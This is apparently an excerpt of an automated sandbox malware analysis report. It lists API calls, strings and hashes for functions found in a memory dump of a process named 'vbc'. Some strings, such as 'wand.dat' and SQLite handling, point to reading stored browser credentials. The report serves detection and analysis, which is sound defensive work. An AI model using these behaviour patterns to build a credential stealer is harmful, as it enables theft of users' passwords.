                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4053608372-0
                                                                                                                                                    • Opcode ID: 812cbb7add7f674ff0468623c6e7b50f355b1e49695ec4f29896983211f76786
                                                                                                                                                    • Instruction ID: 44ea64674f021cea2031e16b60495934b5371f4db2927085d3abb6a650cf4446
                                                                                                                                                    • Opcode Fuzzy Hash: 812cbb7add7f674ff0468623c6e7b50f355b1e49695ec4f29896983211f76786
                                                                                                                                                    • Instruction Fuzzy Hash: 6601F4B140011DBEAF115FA9DCC5CAF7EACDA457E8720036AF810E2190E6344E4056B8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040A302 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetParent.USER32(?), ref: 0040A314
                                                                                                                                                    • GetWindowRect.USER32 ref: 0040A321
                                                                                                                                                    • GetClientRect.USER32 ref: 0040A32C
                                                                                                                                                    • MapWindowPoints.USER32 ref: 0040A33C
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040A358
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                    • Opcode ID: 08c57ff735731e7da7a27fa3f9b2ad0737e344cc782b350b7b638dd860d33b4b
                                                                                                                                                    • Instruction ID: 816d64d46c4b910dad83cc5cff1f19606824cbaca0e9d5d20ff5cebd8420fa85
                                                                                                                                                    • Opcode Fuzzy Hash: 08c57ff735731e7da7a27fa3f9b2ad0737e344cc782b350b7b638dd860d33b4b
                                                                                                                                                    • Instruction Fuzzy Hash: 06014836800129BBDB11AFA59C49EFFBFBCFF46B15F044169F901A2190D77896028BA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004421EB Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000000,00410671,?,?), ref: 00442202
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00442216
                                                                                                                                                    • memset.MSVCRT ref: 00442225
                                                                                                                                                      • Part of subcall function 00407B93: ReadFile.KERNELBASE(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00442248
                                                                                                                                                      • Part of subcall function 00441FDC: memchr.MSVCRT ref: 00442017
                                                                                                                                                      • Part of subcall function 00441FDC: memcpy.MSVCRT ref: 004420BB
                                                                                                                                                      • Part of subcall function 00441FDC: memcpy.MSVCRT ref: 004420CD
                                                                                                                                                      • Part of subcall function 00441FDC: memcpy.MSVCRT ref: 004420F5
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0044224F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1471605966-0
                                                                                                                                                    • Opcode ID: b598463014c614ebe371b6abc587b169cc581dfa21e6606e22753a0b647566d4
                                                                                                                                                    • Instruction ID: 5cd116c641245c85bcd5bad65d9d69835b0888748ca48550e443bbafd66aa86b
                                                                                                                                                    • Opcode Fuzzy Hash: b598463014c614ebe371b6abc587b169cc581dfa21e6606e22753a0b647566d4
                                                                                                                                                    • Instruction Fuzzy Hash: 3DF0FC325041007AE21077329D4AF6B7B9CDF85761F10053FF515911D2EA789904C179
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040ADBB Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??3@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                    • Opcode ID: 71da32900e05e7392b15d97de4efa56f9abc2cc5c2514c7a65295a7a2cc172a2
                                                                                                                                                    • Instruction ID: 7485fa72425b52f9fdb5b203d173836123891f19866e380edd82503d68adac07
                                                                                                                                                    • Opcode Fuzzy Hash: 71da32900e05e7392b15d97de4efa56f9abc2cc5c2514c7a65295a7a2cc172a2
                                                                                                                                                    • Instruction Fuzzy Hash: D8F0FF72509701AFD720AF6999D991BB7F9BF943147A0493FF049D3A41CB78A8904A18
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C35B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040C37F
                                                                                                                                                    • memset.MSVCRT ref: 0040C396
                                                                                                                                                      • Part of subcall function 0040B9C3: wcscpy.MSVCRT ref: 0040B9C8
                                                                                                                                                      • Part of subcall function 0040B9C3: _wcslwr.MSVCRT ref: 0040BA03
                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040C3C5
                                                                                                                                                      • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                                                                                                                      • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                                                                                                                                    • String ID: </%s>
                                                                                                                                                    • API String ID: 168708657-259020660
                                                                                                                                                    • Opcode ID: ed3ca334932eb13030ad141ea1100de8b1267ec76abb3a8f7f71a50922ffdfbd
                                                                                                                                                    • Instruction ID: 40532074a48dce177473b235f1db1661615fe75cb863f0afecc7fe9ed9b88556
                                                                                                                                                    • Opcode Fuzzy Hash: ed3ca334932eb13030ad141ea1100de8b1267ec76abb3a8f7f71a50922ffdfbd
                                                                                                                                                    • Instruction Fuzzy Hash: 910136F3D4012976EB20A755DC45FEE76BCEF45308F4000B6BB09B7181DB78AA458AA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040A414 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                    • String ID: caption
                                                                                                                                                    • API String ID: 1523050162-4135340389
                                                                                                                                                    • Opcode ID: 0770d01bbebb907716830064d8bced7af567b4e8952be56cced1b648d4788750
                                                                                                                                                    • Instruction ID: f5bb4e3483ddd063dbb45333af41605001ac6cd66b5ccbc099165aa82e617e5a
                                                                                                                                                    • Opcode Fuzzy Hash: 0770d01bbebb907716830064d8bced7af567b4e8952be56cced1b648d4788750
                                                                                                                                                    • Instruction Fuzzy Hash: 44F0C83690031466FB20EB51DD4EB9A3768AB04755F5000B6FF04B61D2DBF89E50CBAE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040103E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004075AD: memset.MSVCRT ref: 004075B7
                                                                                                                                                      • Part of subcall function 004075AD: wcscpy.MSVCRT ref: 004075F7
                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040105D
                                                                                                                                                    • SendDlgItemMessageW.USER32 ref: 0040107C
                                                                                                                                                    • SendDlgItemMessageW.USER32 ref: 0040109A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                    • API String ID: 210187428-168460110
                                                                                                                                                    • Opcode ID: 9567ec9b2f0dc6d22a5446aca1e43186409379ab266c501c72e5b3238589e89f
                                                                                                                                                    • Instruction ID: b86dbe1d582a7894089203107e7a1e4413fc3d6f7e8de8594febed0b37e93160
                                                                                                                                                    • Opcode Fuzzy Hash: 9567ec9b2f0dc6d22a5446aca1e43186409379ab266c501c72e5b3238589e89f
                                                                                                                                                    • Instruction Fuzzy Hash: 56F05E75A4030877E621ABA0DC06F8A7BB9B740B01F000935B711B51E0D7E4A285C658
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004076CD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassName_wcsicmpmemset
                                                                                                                                                    • String ID: edit
                                                                                                                                                    • API String ID: 2747424523-2167791130
                                                                                                                                                    • Opcode ID: 5d550bad1fc3d430151135b806da61cbea55bdd82f1e1fbc5f53ec133c7d6f5f
                                                                                                                                                    • Instruction ID: 51a03c7d5923a90201923a44b10f324a390683a0d3b2f84b2934c4bf373e0ab9
                                                                                                                                                    • Opcode Fuzzy Hash: 5d550bad1fc3d430151135b806da61cbea55bdd82f1e1fbc5f53ec133c7d6f5f
                                                                                                                                                    • Instruction Fuzzy Hash: A9E04872D8031E7AFB14ABA0DC4BFA977BCBB04704F5001F5B615E10D2EBB4A6454A5C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004121C3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNEL32(shell32.dll,0040E314,00000000,?,00000002), ref: 004121D1
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004121E6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                    • API String ID: 2574300362-880857682
                                                                                                                                                    • Opcode ID: 881f98a91457903b94e991739f1253563cd1b946a507866072d03daf316dbad8
                                                                                                                                                    • Instruction ID: 4b50289c71ca44835333f785f02b611be4b8370b72da6f54bb0e40a9521e89f3
                                                                                                                                                    • Opcode Fuzzy Hash: 881f98a91457903b94e991739f1253563cd1b946a507866072d03daf316dbad8
                                                                                                                                                    • Instruction Fuzzy Hash: 86D0C774600313BADB108F209D48B4239746712743F251036F430D1771DF7895C49A1C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041B0C3 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy$memcmp
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3384217055-0
                                                                                                                                                    • Opcode ID: c21ad6a5d3121964cfee4e4549eeaad2127827bfa0247cfb1633fe6ae368a6b9
                                                                                                                                                    • Instruction ID: 295c5a0bc2866328f8dcc37ada2a4d99e769f04d629d2bea2717987aff5dfa66
                                                                                                                                                    • Opcode Fuzzy Hash: c21ad6a5d3121964cfee4e4549eeaad2127827bfa0247cfb1633fe6ae368a6b9
                                                                                                                                                    • Instruction Fuzzy Hash: 01217C72E10248BBDB18DAA5DC56E9F73ECEB44740F50042AB512D7281EB78E644C765
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E5BA Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                    • Opcode ID: ef22b1934ad2d52127aca45cd93deb21b3ee899ba2995d0c9766137b2d6f5093
                                                                                                                                                    • Instruction ID: 5db9a22820b402d4d4dd4a010236648e296a7231ae54e5ee969484aed16c8927
                                                                                                                                                    • Opcode Fuzzy Hash: ef22b1934ad2d52127aca45cd93deb21b3ee899ba2995d0c9766137b2d6f5093
                                                                                                                                                    • Instruction Fuzzy Hash: D301F0B174070077D335AA35CC03F1A73E49FA1714F400E1DF152666C2D7F8A105866D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00415494 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 167COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004154B8
                                                                                                                                                    • memset.MSVCRT ref: 004154E8
                                                                                                                                                      • Part of subcall function 0041538D: memset.MSVCRT ref: 004153AA
                                                                                                                                                      • Part of subcall function 0041538D: UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 004153CA
                                                                                                                                                      • Part of subcall function 00414EFE: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414F2A
                                                                                                                                                      • Part of subcall function 00414EFE: SetEndOfFile.KERNEL32(?), ref: 00414F54
                                                                                                                                                      • Part of subcall function 00414EFE: GetLastError.KERNEL32 ref: 00414F5E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$File$ErrorLastUnlockUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID: %s-shm$,A
                                                                                                                                                    • API String ID: 1271386063-2158068007
                                                                                                                                                    • Opcode ID: e97150ecd3292b0c1fc6f67ffbb4081b9a3a76a2bb60b8d44e9283291b6bd327
                                                                                                                                                    • Instruction ID: 8012e8fd2c705de7aa363bc2bd32bd15ad04531b7aa24a5a7ab2fd91cc4b7507
                                                                                                                                                    • Opcode Fuzzy Hash: e97150ecd3292b0c1fc6f67ffbb4081b9a3a76a2bb60b8d44e9283291b6bd327
                                                                                                                                                    • Instruction Fuzzy Hash: B1510671504B05FFD710AF21DC02BDB77A6AF80754F10481FF9299A282EBB9E5908B9D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00415804 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004158E7
                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 00415912
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00415939
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041594F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1661045500-0
                                                                                                                                                    • Opcode ID: e54a1143c91b2cced6003210cc0bcdbeb5c1320b0c8b584585a67ef015de7640
                                                                                                                                                    • Instruction ID: 02e61587b06ba7d058713df3830c0e33945dcb010177779d6ae1e8dc7ea6695b
                                                                                                                                                    • Opcode Fuzzy Hash: e54a1143c91b2cced6003210cc0bcdbeb5c1320b0c8b584585a67ef015de7640
                                                                                                                                                    • Instruction Fuzzy Hash: B6518EB4214B02DFD724DF25C981AA7B7E9FB84315F10492FE88286651E734E854CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0042C345 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 132COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004132EA: memset.MSVCRT ref: 00413304
                                                                                                                                                    • memcpy.MSVCRT ref: 0042C42D
                                                                                                                                                    Strings
                                                                                                                                                    • virtual tables may not be altered, xrefs: 0042C384
                                                                                                                                                    • sqlite_altertab_%s, xrefs: 0042C3FE
                                                                                                                                                    • Cannot add a column to a view, xrefs: 0042C39A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                    • API String ID: 1297977491-2063813899
                                                                                                                                                    • Opcode ID: 73f7123a41afc254934908830e0006766df9d40b851d17961e81b3466ae4c6b7
                                                                                                                                                    • Instruction ID: 3e8a37011c5d834ac6e6d4f8fd11fd3d4e87e0ccd438cada7bf19ffd6667b676
                                                                                                                                                    • Opcode Fuzzy Hash: 73f7123a41afc254934908830e0006766df9d40b851d17961e81b3466ae4c6b7
                                                                                                                                                    • Instruction Fuzzy Hash: 03419D71A00615AFDB10DF69D881A5EB7F0FF08314F24856BE8489B352D778EA51CB88
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0042E398 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 132COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy
                                                                                                                                                    • String ID: $, $CREATE TABLE
                                                                                                                                                    • API String ID: 3510742995-3459038510
                                                                                                                                                    • Opcode ID: 9c967c3a06afb765e02c907f2e49235dd04f948cd2abf78a2709aa5cc33f4167
                                                                                                                                                    • Instruction ID: 75c0c8dac0447bb43292008ef446c40d7ab48a9469891862f1914eead86e2b05
                                                                                                                                                    • Opcode Fuzzy Hash: 9c967c3a06afb765e02c907f2e49235dd04f948cd2abf78a2709aa5cc33f4167
                                                                                                                                                    • Instruction Fuzzy Hash: C3518171E00219DFCF10DF9AD4856AEB7B5FF44309F64809BE841AB205D778AA45CB98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040475A Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004047A1
                                                                                                                                                      • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                                                                                                                      • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
                                                                                                                                                      • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
                                                                                                                                                      • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
                                                                                                                                                      • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
                                                                                                                                                      • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                                                                                                                      • Part of subcall function 00407CFE: memset.MSVCRT ref: 00407D1F
                                                                                                                                                      • Part of subcall function 00407CFE: _snwprintf.MSVCRT ref: 00407D52
                                                                                                                                                      • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D5E
                                                                                                                                                      • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D76
                                                                                                                                                      • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D84
                                                                                                                                                      • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D97
                                                                                                                                                      • Part of subcall function 00407AB6: GetOpenFileNameW.COMDLG32(?), ref: 00407AFF
                                                                                                                                                      • Part of subcall function 00407AB6: wcscpy.MSVCRT ref: 00407B0D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameOpenString_snwprintf
                                                                                                                                                    • String ID: *.*$dat$wand.dat
                                                                                                                                                    • API String ID: 3589925243-1828844352
                                                                                                                                                    • Opcode ID: ee95740454303ceeab932a838ec3e971a5e4e933b383f4235399895267209d19
                                                                                                                                                    • Instruction ID: 6d0f55f818233349c8d1636aac4371a0276c995c789a620d4a51b657e5e4e923
                                                                                                                                                    • Opcode Fuzzy Hash: ee95740454303ceeab932a838ec3e971a5e4e933b383f4235399895267209d19
                                                                                                                                                    • Instruction Fuzzy Hash: 6F419971A04206AFDB14EF61D885AAE77B4FF40314F10C42BFA05A71C2EF79A9958BD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040CBC1 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040B1B3: ??2@YAPAXI@Z.MSVCRT ref: 0040B1D4
                                                                                                                                                      • Part of subcall function 0040B1B3: ??3@YAXPAX@Z.MSVCRT ref: 0040B29B
                                                                                                                                                    • wcslen.MSVCRT ref: 0040CBEF
                                                                                                                                                    • _wtoi.MSVCRT ref: 0040CBFB
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040CC49
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040CC5A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1549203181-0
                                                                                                                                                    • Opcode ID: 567ae35796e479033978641934fe8efa79e81af9abf3b8ba23fb9af2cd80c235
                                                                                                                                                    • Instruction ID: 2e88af878a7a0ebae712eab1be6a0374a06ab0ac9bbd2c3eb3becf244d067ed8
                                                                                                                                                    • Opcode Fuzzy Hash: 567ae35796e479033978641934fe8efa79e81af9abf3b8ba23fb9af2cd80c235
                                                                                                                                                    • Instruction Fuzzy Hash: C3416D31900204EBEF21DF59C5C4A9DBBB4EF45319F1546BAEC09EB3A6D638D940CB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E51C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy
                                                                                                                                                    • String ID: @|=D
                                                                                                                                                    • API String ID: 3510742995-4242725666
                                                                                                                                                    • Opcode ID: df00fe4d456d847bcc816d9924c913a63d4017986857a83741e135789728a0a6
                                                                                                                                                    • Instruction ID: e04d1c669876fac24280ac48723ffca9e388da4b41f072ca806e7767fffd92f4
                                                                                                                                                    • Opcode Fuzzy Hash: df00fe4d456d847bcc816d9924c913a63d4017986857a83741e135789728a0a6
                                                                                                                                                    • Instruction Fuzzy Hash: 19113BF29003047BDB348E66DC84C5A77A8EB603987000E3EF90696291F675DF69C6D8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

